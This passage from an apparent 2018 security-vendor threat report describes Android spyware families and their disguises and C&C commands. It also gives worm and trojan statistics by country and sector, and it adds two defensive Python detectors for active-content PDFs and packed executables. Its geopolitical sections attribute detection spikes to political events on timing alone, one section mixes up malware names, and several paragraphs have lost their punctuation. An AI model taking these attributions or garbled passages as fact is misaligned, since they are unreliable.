The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos
Records the screen
Executes shell commands
Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution
FlexiSpy, MBackup
HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy
随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z
CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is the list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent
pl.mbank
aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1:
CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره
Proxy, دوست یاب, Telegram Ton
شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on the Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1:
Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot
Reccoder-Call, QRCodeBar Scanner APK
Let me love you ringtone, Iphone Ringtone, Night light
Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake "skip option" notification. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named below.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
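A first triage of a suspect PDF is structural: a document that runs something the moment it is opened carries an auto-trigger name (/OpenAction or /AA) wired to an action name (/JavaScript, /JS, /Launch, /EmbeddedFile). The Python below is an added example, not part of the report; TRIGGER_NAMES, ACTION_NAMES and triage_pdf are names chosen here, and the two sample documents are constructed for the example, not real malicious files. It also handles the #xx hex escaping that PDF syntax allows inside name objects, which a grep for the literal spelling misses.

```python
import re

# PDF name objects that matter for triage. A trigger alone (e.g. /OpenAction jumping
# to a page) is common in benign files; a trigger combined with an executing action
# is the shape of a drive-by document.
TRIGGER_NAMES = (b"/OpenAction", b"/AA")
ACTION_NAMES = (b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/RichMedia")


def normalise_names(data: bytes) -> bytes:
    """Decode the #xx hex escapes PDF permits inside name objects.

    /J#61vaScript is the same name as /JavaScript to a conforming reader. The
    decode is applied to the whole file, which is over-broad (a '#' + two hex
    digits in a stream also gets rewritten) but harmless for counting names.
    """
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes, names) -> dict:
    """Count each name, requiring a non-alphanumeric after it so /JS does not match /JSX."""
    norm = normalise_names(data)
    return {
        name.decode(): len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", norm))
        for name in names
    }


def triage_pdf(data: bytes) -> dict:
    """Return a coarse risk level plus the evidence it was based on."""
    if not data.startswith(b"%PDF-"):
        return {"risk": "not-a-pdf", "triggers": {}, "actions": {}, "hex_escaped_names": False}
    triggers = count_names(data, TRIGGER_NAMES)
    actions = count_names(data, ACTION_NAMES)
    has_trigger = any(triggers.values())
    has_action = any(actions.values())
    hex_escaped = b"#" in data and normalise_names(data) != data
    if has_trigger and has_action:
        risk = "high"      # something executes automatically on open
    elif has_action or has_trigger:
        risk = "medium"    # active content present, but not auto-run (or vice versa)
    else:
        risk = "low"
    return {"risk": risk, "triggers": triggers, "actions": actions,
            "hex_escaped_names": hex_escaped}


# Constructed samples (not real malware): a plain one-page file, and the same file
# with an auto-run JavaScript action whose name is hex-escaped to dodge a naive grep.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

ACTIVE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (var x = 1) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_PDF), ("active", ACTIVE_PDF)):
        print(label, triage_pdf(sample))
```

A "high" result is a reason to detonate the file in a sandbox or open it with JavaScript disabled, not proof of an exploit; equally, a "low" result only means the file has no active-content hooks at this syntactic level (object streams and encrypted files need decoding before this check is meaningful).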
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
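Spotting a packed executable is the defender's side of this section. The Python below is an added example, not the report's material: it parses the PE section table by hand, flags the UPX0/UPX1 section names and the "UPX!" magic that stock UPX leaves in the file, and falls back on per-section Shannon entropy, which is what still fires once a modified UPX has scrubbed those strings. build_sample_pe and the three SAMPLE_* images are constructed for the example and are not loadable programs; the 7.0 bits-per-byte threshold is an assumption.

```python
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: compressed or encrypted data sits near 8.0, plain code well below."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table.

    Returns [(name, raw_bytes)]; only the header fields needed are decoded.
    """
    if blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]       # NumberOfSections
    size_of_optional = struct.unpack_from("<H", blob, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = blob[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, blob[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess_packing(blob: bytes, threshold: float = 7.0, min_size: int = 256) -> dict:
    """Combine string-based UPX indicators with the entropy heuristic that survives renaming."""
    sections = pe_sections(blob)
    names = [name for name, _ in sections]
    high = [(name, round(shannon_entropy(data), 2))
            for name, data in sections
            if len(data) >= min_size and shannon_entropy(data) > threshold]
    upx_names = any(name.startswith("UPX") for name in names)
    upx_marker = b"UPX!" in blob   # magic stock UPX writes into its pack header
    return {
        "sections": names,
        "upx_section_names": upx_names,
        "upx_marker": upx_marker,
        "high_entropy_sections": high,
        "likely_packed": upx_names or upx_marker or bool(high),
    }


def build_sample_pe(sections, marker: bytes = b"") -> bytes:
    """Assemble a minimal PE32 image (headers, section table, raw data) for the parser above."""
    n = len(sections)
    size_of_optional = 224
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, 0x10B)                         # PE32 magic
    table_off = 64 + 4 + 20 + size_of_optional
    body = bytearray(marker)                                           # optional "UPX!" blob
    table = b""
    for name, payload in sections:
        raw_ptr = table_off + 40 * n + len(body)
        table += struct.pack("<8sIIIIIIHHI", name, len(payload), 0x1000,
                             len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += payload
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + table + bytes(body)


# Constructed section contents: deterministic pseudo-random bytes stand in for a
# compressed body, a repeating 16-byte pattern (exactly 4.0 bits/byte) for plain code.
_rng = random.Random(2018)
_HIGH = bytes(_rng.getrandbits(8) for _ in range(4096))
_LOW = bytes(range(16)) * 256

SAMPLE_STOCK_UPX = build_sample_pe([(b"UPX0", b""), (b"UPX1", _HIGH), (b".rsrc", _LOW)], marker=b"UPX!")
SAMPLE_MODIFIED_UPX = build_sample_pe([(b".text", _HIGH), (b".data", _LOW)])   # names and magic scrubbed
SAMPLE_PLAIN = build_sample_pe([(b".text", _LOW), (b".data", _LOW)])

if __name__ == "__main__":
    for label, image in (("stock", SAMPLE_STOCK_UPX), ("modified", SAMPLE_MODIFIED_UPX), ("plain", SAMPLE_PLAIN)):
        print(label, assess_packing(image))
```

The modified sample is the point of the exercise: with section names and the magic string gone, the string indicators are silent and only the entropy of the compressed section gives it away. A high-entropy section alone is not proof of packing (resources such as images or embedded certificates compress poorly too), so in practice the verdict is combined with import-table size and entry-point location.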
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to create a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and helps focus limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes. This is an inference from timing alone: the detection counts themselves do not attribute the activity to any particular actor.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo's further research on the detected malware identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension, and at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Vantaa, a suburb of Helsinki, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in host infections worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the abuse of legitimate tools like PowerShell in attacks are clear evidence of this rise in sophistication.
